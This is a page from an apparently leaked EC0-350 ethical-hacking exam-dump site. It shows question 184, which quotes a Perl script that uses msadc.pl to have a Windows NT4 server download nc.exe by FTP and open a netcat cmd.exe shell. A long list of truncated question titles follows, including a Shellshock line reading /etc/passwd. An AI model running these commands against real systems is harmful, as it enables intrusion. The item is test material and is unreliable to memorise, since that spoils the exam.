EC0-350 Exam Dumps | A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web

<< Prev Question Next Question >>

Question 184/330

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:
system("perl msadc.pl -h $host -C \"echo open $your >testfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>testfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>testfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>testfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>testfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>testfile\""); ("perl msadc.pl -h $host -C \"echo quit>>testfile\""); system("perl msadc.pl -h $host -C \"ftp \-s\:testfile\"");
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
Which exploit is indicated by this script?

A. A denial of service exploit

B. A buffer overflow exploit

C. A SQL injection exploit

D. A chained exploit

Question List (330q): Question 1: PGP, SSL, and IKE are all examples of which type of cryptogr...; Question 2: How is sniffing broadly categorized?...; Question 3: The configuration allows a wired or wireless network interfa...; Question 4: Which of the following resources does NMAP need to be used a...; Question 5: Which of the following techniques does a vulnerability scann...; Question 6: Which of the following is a protocol specifically designed f...; Question 7: An incident investigator asks to receive a copy of the event...; Question 8: What information should an IT system analysis provide to the...; Question 9: A security consultant decides to use multiple layers of anti...; Question 10: The Heartbleed bug was discovered in 2014 and is widely refe...; Question 11: What is the most secure way to mitigate the theft of corpora...; Question 12: Which of the following is a hardware requirement that either...; Question 13: You are attempting to man-in-the-middle a session. Which pro...; Question 14: Which tool allows analysts and pen testers to examine links ...; Question 15: Which of the following describes the characteristics of a Bo...; Question 16: Which of the following is an example of an asymmetric encryp...; Question 17: What is the outcome of the comm"nc -l -p 2222 | nc 10.1.0.43...; Question 18: At a Windows Server command prompt, which command could be u...; Question 19: Which solution can be used to emulate computer services, suc...; Question 20: Which of the following tools performs comprehensive tests ag...; Question 21: While using your bank's online servicing you notice the foll...; Question 22: When creating a security program, which approach would be us...; Question 23: Which of the following identifies the three modes in which S...; Question 24: A security consultant is trying to bid on a large contract t...; Question 25: Which of the following defines the role of a root Certificat...; Question 26: A Network Administrator was recently promoted to Chief Secur...; Question 27: Which of the following examples best represents a logical or...; Question 28: A security analyst is performing an audit on the network to ...; Question 29: Which Open Web Application Security Project (OWASP) implemen...; Question 30: What is the main difference between a "Normal" SQL Injection...; Question 31: A security engineer has been asked to deploy a secure remote...; Question 32: Which of the following is an application that requires a hos...; Question 33: The following is part of a log file taken from the machine o...; Question 34: During a wireless penetration test, a tester detects an acce...; Question 35: Which of the following is a common Service Oriented Architec...; Question 36: A network administrator received an administrative alert at ...; Question 37: Which of the following is a primary service of the U.S. Comp...; Question 38: Firewalk has just completed the second phase (the scanning p...; Question 39: A common cryptographical tool is the use of XOR. XOR the fol...; Question 40: A consultant is hired to do physical penetration testing at ...; Question 41: A hacker has successfully infected an internet-facing server...; Question 42: Which type of intrusion detection system can monitor and ale...; Question 43: Which of the following network attacks relies on sending an ...; Question 44: ICMP ping and ping sweeps are used to check for active syste...; Question 45: Which of the following guidelines or standards is associated...; Question 46: Which of the following programming languages is most vulnera...; Question 47: SOAP services use which technology to format information?...; Question 48: Which of the following is the structure designed to verify a...; Question 49: Which of the following levels of algorithms does Public Key ...; Question 50: Which of the following items of a computer system will an an...; Question 51: Which technical characteristic do Ethereal/Wireshark, TCPDum...; Question 52: You are a Network Security Officer. You have two machines. T...; Question 53: Which of the following is a client-server tool utilized to e...; Question 54: One advantage of an application-level firewall is the abilit...; Question 55: Which of the following viruses tries to hide from anti-virus...; Question 56: Which tool is used to automate SQL injections and exploit a ...; Question 57: International Organization for Standardization (ISO) standar...; Question 58: env x=`(){ :;};echo exploit` bash -c 'cat /etc/passwd' What ...; Question 59: The "black box testing" methodology enforces which kind of r...; Question 60: The use of technologies like IPSec can help guarantee the fo...; Question 61: Which of the following can take an arbitrary length of input...; Question 62: An attacker gains access to a Web server's database and disp...; Question 63: An attacker has installed a RAT on a host. The attacker want...; Question 64: A regional bank hires your company to perform a security ass...; Question 65: A botnet can be managed through which of the following?...; Question 66: Jesse receives an email with an attachment labeled "Court_No...; Question 67: Which of these options is the most secure procedure for stor...; Question 68: Diffie-Hellman (DH) groups determine the strength of the key...; Question 69: While checking the settings on the internet browser, a techn...; Question 70: Which of the following describes the characteristics of a Bo...; Question 71: An attacker has captured a target file that is encrypted wit...; Question 72: Which command lets a tester enumerate alive systems in a cla...; Question 73: Which tool would be used to collect wireless packet data?...; Question 74: Which of the following is an example of two factor authentic...; Question 75: Jimmy is standing outside a secure entrance to a facility. H...; Question 76: How do employers protect assets with security policies perta...; Question 77: What technique is used to perform a Connection Stream Parame...; Question 78: During a penetration test, the tester conducts an ACK scan u...; Question 79: A company has publicly hosted web applications and an intern...; Question 80: What is a successful method for protecting a router from pot...; Question 81: A large company intends to use Blackberry for corporate mobi...; Question 82: A consultant has been hired by the V.P. of a large financial...; Question 83: Which of the following descriptions is true about a static N...; Question 84: A medium-sized healthcare IT business decides to implement a...; Question 85: Some passwords are stored using specialized encryption algor...; Question 86: It is a kind of malware (malicious software) that criminals ...; Question 87: Which statement is TRUE regarding network firewalls preventi...; Question 88: Which of the following parameters describe LM Hash (see exhi...; Question 89: Passive reconnaissance involves collecting information throu...; Question 90: An attacker sniffs encrypted traffic from the network and is...; Question 91: An organization hires a tester to do a wireless penetration ...; Question 92: A hacker is attempting to use nslookup to query Domain Name ...; Question 93: A security engineer is attempting to map a company's interna...; Question 94: Which of the following is the greatest threat posed by backu...; Question 95: As a Certified Ethical Hacker, you were contracted by a priv...; Question 96: The Open Web Application Security Project (OWASP) testing me...; Question 97: When you are getting information about a web server, it is v...; Question 98: Your company was hired by a small healthcare provider to per...; Question 99: Which of the following does proper basic configuration of sn...; Question 100: Which cipher encrypts the plain text digit (bit or byte) one...; Question 101: The "white box testing" methodology enforces what kind of re...; Question 102: Which command line switch would be used in NMAP to perform o...; Question 103: Which of the following is the BEST way to defend against net...; Question 104: Which of the following is an advantage of utilizing security...; Question 105: On a Linux device, which of the following commands will star...; Question 106: Which of the following is a detective control?...; Question 107: A penetration tester is hired to do a risk assessment of a c...; Question 108: Which of the following is a preventive control?...; Question 109: What are the three types of authentication?...; Question 110: The network administrator for a company is setting up a webs...; Question 111: Which of the following problems can be solved by using Wires...; Question 112: You have several plain-text firewall logs that you must revi...; Question 113: What is the main advantage that a network-based IDS/IPS syst...; Question 114: Which United States legislation mandates that the Chief Exec...; Question 115: Which of the following is a hashing algorithm?...; Question 116: A penetration tester was hired to perform a penetration test...; Question 117: Low humidity in a data center can cause which of the followi...; Question 118: Initiating an attack against targeted businesses and organiz...; Question 119: You are performing information gathering for an important pe...; Question 120: Perspective clients want to see sample reports from previous...; Question 121: Which type of access control is used on a router or firewall...; Question 122: An Internet Service Provider (ISP) has a need to authenticat...; Question 123: A covert channel is a channel that...; Question 124: Which of the following techniques will identify if computer ...; Question 125: If the final set of security controls does not eliminate all...; Question 126: Which of the following processes of PKI (Public Key Infrastr...; Question 127: Which of the following items is unique to the N-tier archite...; Question 128: A bank stores and processes sensitive privacy information re...; Question 129: A hacker, who posed as a heating and air conditioning specia...; Question 130: WPA2 uses AES for wireless data encryption at which of the f...; Question 131: From the two screenshots below, which of the following is oc...; Question 132: You have compromised a server and successfully gained a root...; Question 133: You have successfully gained access to a linux server and wo...; Question 134: A certified ethical hacker (CEH) completed a penetration tes...; Question 135: When you are collecting information to perform a data analys...; Question 136: Which of the following is designed to identify malicious att...; Question 137: Which initial procedure should an ethical hacker perform aft...; Question 138: Which of the following is the successor of SSL?...; Question 139: If a tester is attempting to ping a target that exists but r...; Question 140: Which of the following is considered an acceptable option wh...; Question 141: A new wireless client is configured to join a 802.11 network...; Question 142: Which of the following types of firewalls ensures that the p...; Question 143: An attacker changes the profile information of a particular ...; Question 144: The use of alert thresholding in an IDS can reduce the volum...; Question 145: What statement is true regarding LM hashes?...; Question 146: Which method of password cracking takes the most time and ef...; Question 147: In Risk Management, how is the term "likelihood" related to ...; Question 148: A penetration tester is conducting a port scan on a specific...; Question 149: You are logged in as a local admin on a Windows 7 system and...; Question 150: What is the process of logging, recording, and resolving eve...; Question 151: You are performing a penetration test. You achieved access v...; Question 152: A company has hired a security administrator to maintain and...; Question 153: An attacker has been successfully modifying the purchase pri...; Question 154: Which of the following processes evaluates the adherence of ...; Question 155: When an alert rule is matched in a network-based IDS like sn...; Question 156: What is the main reason the use of a stored biometric is vul...; Question 157: Which of the following is not a Bluetooth attack?...; Question 158: Which of the following statements regarding ethical hacking ...; Question 159: A technician is resolving an issue where a computer is unabl...; Question 160: Employees in a company are no longer able to access Internet...; Question 161: After trying multiple exploits, you've gained root access to...; Question 162: What is the correct PCAP filter to capture all TCP traffic g...; Question 163: A recently hired network security associate at a local bank ...; Question 164: A penetration tester is attempting to scan an internal corpo...; Question 165: A security policy will be more accepted by employees if it i...; Question 166: Which of the following tools is used to detect wireless LANs...; Question 167: While performing data validation of web content, a security ...; Question 168: Which of the following ensures that updates to policies, pro...; Question 169: You have compromised a server on a network and successfully ...; Question 170: The intrusion detection system at a software development com...; Question 171: Which of the following parameters enables NMAP's operating s...; Question 172: How does an operating system protect the passwords used for ...; Question 173: Your company performs penetration tests and security assessm...; Question 174: You are tasked to perform a penetration test. While you are ...; Question 175: How does the Address Resolution Protocol (ARP) work?...; Question 176: Which security control role does encryption meet?...; Question 177: A developer for a company is tasked with creating a program ...; Question 178: A hacker is attempting to see which ports have been left ope...; Question 179: Which of the following is an example of IP spoofing?...; Question 180: Which of the following algorithms provides better protection...; Question 181: This asymmetry cipher is based on factoring the product of t...; Question 182: Which of the following is a symmetric cryptographic standard...; Question 183: The security concept of "separation of duties" is most simil...; Question 184: A tester has been using the msadc.pl attack script to execut...; Question 185: Which property ensures that a hash function will not produce...; Question 186: Which of the following conditions must be given to allow a t...; Question 187: What is one thing a tester can do to ensure that the softwar...; Question 188: A company is using Windows Server 2003 for its Active Direct...; Question 189: You work as a Security Analyst for a retail organization. In...; Question 190: The Open Web Application Security Project (OWASP) is the wor...; Question 191: What are the three types of compliance that the Open Source ...; Question 192: Which of the following open source tools would be the best c...; Question 193: Which tool can be used to silently copy files from USB devic...; Question 194: When using Wireshark to acquire packet capture on a network,...; Question 195: Pentest results indicate that voice over IP traffic is trave...; Question 196: Which system consists of a publicly available set of databas...; Question 197: Company A and Company B have just merged and each has its ow...; Question 198: A network security administrator is worried about potential ...; Question 199: An IT security engineer notices that the company's web serve...; Question 200: Which of the following security operations is used for deter...; Question 201: Which of the following types of firewall inspects only heade...; Question 202: The precaution of prohibiting employees from bringing person...; Question 203: A company firewall engineer has configured a new DMZ to allo...; Question 204: After gaining access to the password hashes used to protect ...; Question 205: When does the Payment Card Industry Data Security Standard (...; Question 206: Which of the following settings enables Nessus to detect whe...; Question 207: To determine if a software program properly handles a wide r...; Question 208: Which of the following is a command line packet analyzer sim...; Question 209: A security analyst in an insurance company is assigned to te...; Question 210: An NMAP scan of a server shows port 69 is open. What risk co...; Question 211: A circuit level gateway works at which of the following laye...; Question 212: You just set up a security system in your network. In what k...; Question 213: You have successfully gained access to your client's interna...; Question 214: The purpose of a __________ is to deny network access to loc...; Question 215: A penetration tester is conducting a port scan on a specific...; Question 216: Which of the following business challenges could be solved b...; Question 217: Which of the following is considered the best way to protect...; Question 218: This phase will increase the odds of success in later phases...; Question 219: What is the primary drawback to using advanced encryption st...; Question 220: Which of the following is a strong post designed to stop a c...; Question 221: A person approaches a network administrator and wants advice...; Question 222: It is a vulnerability in GNU's bash shell, discovered in Sep...; Question 223: The chance of a hard drive failure is once every three years...; Question 224: Which of the following programs is usually targeted at Micro...; Question 225: The fundamental difference between symmetric and asymmetric ...; Question 226: A pentester gains access to a Windows application server and...; Question 227: Your team has won a contract to infiltrate an organization. ...; Question 228: An attacker uses a communication channel within an operating...; Question 229: In 2007, this wireless security algorithm was rendered usele...; Question 230: What is the main disadvantage of the scripting languages as ...; Question 231: Advanced encryption standard is an algorithm used for which ...; Question 232: It is a short-range wireless communication technology intend...; Question 233: During a penetration test, a tester finds that the web appli...; Question 234: A certified ethical hacker (CEH) is approached by a friend w...; Question 235: Ricardo wants to send secret messages to a competitor compan...; Question 236: When analyzing the IDS logs, the system administrator notice...; Question 237: During a blackbox pen test you attempt to pass IRC traffic o...; Question 238: In the software security development life cyle process, thre...; Question 239: The following is a sample of output from a penetration teste...; Question 240: What type of OS fingerprinting technique sends specially cra...; Question 241: What results will the following command yield: 'NMAP -sS -O ...; Question 242: A computer science student needs to fill some information in...; Question 243: A company has five different subnets: 192.168.1.0, 192.168.2...; Question 244: While testing the company's web applications, a tester attem...; Question 245: Which of the following tools would be the best choice for ac...; Question 246: > NMAP -sn 192.168.11.200-215 The NMAP command above perf...; Question 247: Which NMAP feature can a tester implement or adjust while sc...; Question 248: When comparing the testing methodologies of Open Web Applica...; Question 249: Which element of Public Key Infrastructure (PKI) verifies th...; Question 250: Bluetooth uses which digital modulation technique to exchang...; Question 251: What is the name of the international standard that establis...; Question 252: To maintain compliance with regulatory requirements, a secur...; Question 253: Which type of antenna is used in wireless communication?...; Question 254: A pentester is using Metasploit to exploit an FTP server and...; Question 255: Which of the following tools will scan a network to perform ...; Question 256: Which type of scan is used on the eye to measure the layer o...; Question 257: Which security strategy requires using several, varying meth...; Question 258: While conducting a penetration test, the tester determines t...; Question 259: How can a policy help improve an employee's security awarene...; Question 260: Nation-state threat actors often discover vulnerabilities an...; Question 261: Which of the following describes a component of Public Key I...; Question 262: This international organization regulates billions of transa...; Question 263: Session splicing is an IDS evasion technique in which an att...; Question 264: Which of the following scanning tools is specifically design...; Question 265: You've gained physical access to a Windows 2008 R2 server wh...; Question 266: One way to defeat a multi-level security solution is to leak...; Question 267: Smart cards use which protocol to transfer the certificate i...; Question 268: It is an entity or event with the potential to adversely imp...; Question 269: Port scanning can be used as part of a technical assessment ...; Question 270: What is a "Collision attack" in cryptography?...; Question 271: Which of the following is the least-likely physical characte...; Question 272: Which of the following cryptography attack methods is usuall...; Question 273: A tester has been hired to do a web application security tes...; Question 274: Which of the following is a design pattern based on distinct...; Question 275: A company's Web development team has become aware of a certa...; Question 276: Which of the following is a characteristic of Public Key Inf...; Question 277: It is a regulation that has a set of guidelines, which shoul...; Question 278: An ethical hacker for a large security research firm perform...; Question 279: Which statement best describes a server type under an N-tier...; Question 280: Which of the following is optimized for confidential communi...; Question 281: You have successfully comprised a server having an IP addres...; Question 282: You are the Systems Administrator for a large corporate orga...; Question 283: You've just been hired to perform a pen test on an organizat...; Question 284: You are using NMAP to resolve domain names into IP addresses...; Question 285: What term describes the amount of risk that remains after th...; Question 286: During a security audit of IT processes, an IS auditor found...; Question 287: A newly discovered flaw in a software application would be c...; Question 288: What is the broadcast address for the subnet 190.86.168.0/22...; Question 289: A Certificate Authority (CA) generates a key pair that will ...; Question 290: Which of the following lists are valid data-gathering activi...; Question 291: Which of the following is a low-tech way of gaining unauthor...; Question 292: A company's security policy states that all Web browsers mus...; Question 293: In the OSI model, where does PPTP encryption take place?...; Question 294: The "gray box testing" methodology enforces what kind of res...; Question 295: Which vital role does the U.S. Computer Security Incident Re...; Question 296: Risks = Threats x Vulnerabilities is referred to as the:...; Question 297: A hacker searches in Google for filetype:pcf to find Cisco V...; Question 298: Which results will be returned with the following Google sea...; Question 299: Which of the following network attacks takes advantage of we...; Question 300: A network administrator discovers several unknown files in t...; Question 301: John the Ripper is a technical assessment tool used to test ...; Question 302: A hacker is attempting to see which IP addresses are current...; Question 303: Which of the following is an extremely common IDS evasion te...; Question 304: Which mode of IPSec should you use to assure security and co...; Question 305: What is the best defense against privilege escalation vulner...; Question 306: Which NMAP command combination would let a tester scan every...; Question 307: What is the benefit of performing an unannounced Penetration...; Question 308: During a recent security assessment, you discover the organi...; Question 309: Which type of scan measures a person's external features thr...; Question 310: Which method can provide a better return on IT security inve...; Question 311: Which of the following statements is TRUE?...; Question 312: How can telnet be used to fingerprint a web server?...; Question 313: An Intrusion Detection System (IDS) has alerted the network ...; Question 314: When utilizing technical assessment methods to assess the se...; Question 315: What is the best description of SQL Injection?...; Question 316: Which of the following tools is used to analyze the files pr...; Question 317: What is the most common method to exploit the "Bash Bug" or ...; Question 318: Windows file servers commonly hold sensitive files, database...; Question 319: Which protocol and port number might be needed in order to s...; Question 320: This tool is an 802.11 WEP and WPA-PSK keys cracking program...; Question 321: Which of the following is a component of a risk assessment?...; Question 322: Which regulation defines security and privacy controls for F...; Question 323: Which of the following is used to indicate a single-line com...; Question 324: Under the "Post-attack Phase and Activities", it is the resp...; Question 325: You have successfully compromised a machine on the network a...; Question 326: A computer technician is using a new version of a word proce...; Question 327: The network administrator contacts you and tells you that sh...; Question 328: Which set of access control solutions implements two-factor ...; Question 329: Which of the following incident handling process phases is r...; Question 330: When setting up a wireless network, an administrator enters ...

Question 184/330

LEAVE A REPLY

Download PDF File